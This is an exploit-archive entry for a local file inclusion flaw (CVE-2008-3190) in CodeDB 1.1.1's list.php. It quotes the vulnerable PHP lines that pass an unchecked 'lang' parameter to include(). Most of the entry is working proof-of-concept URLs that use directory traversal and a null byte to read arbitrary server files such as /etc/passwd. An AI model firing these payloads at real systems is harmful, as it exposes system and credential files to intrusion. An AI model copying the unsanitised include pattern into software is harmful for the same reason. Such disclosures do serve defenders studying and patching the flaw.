CodeDB 1.1.1 - 'list.php' Local File Inclusion



EKU-ID: 13994 CVE: OSVDB-47027;CVE-2008-3190 OSVDB-ID:
Author: cOndemned Published: 2008-07-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


###############################################################################
#
#   Name    :   CodeDB (list.php lang) Local File Inclusion Vulnerability
#   Author  :   cOndemned
#   Greetz  :   ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

    // list.php

    2.  $lang = htmlspecialchars($_GET['lang']);            // ok, but.... for what ? lol

    7.  if(file_exists('templates/'.$lang.'_middle.php'))   // We'll have to cut off rest of filename & extension
	8.      include('templates/'.$lang.'_middle.php');      // Ekhm... pwned ;d


Proof of Concept :

    http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
    http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
    http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00


EoF.

# milw0rm.com [2008-07-14]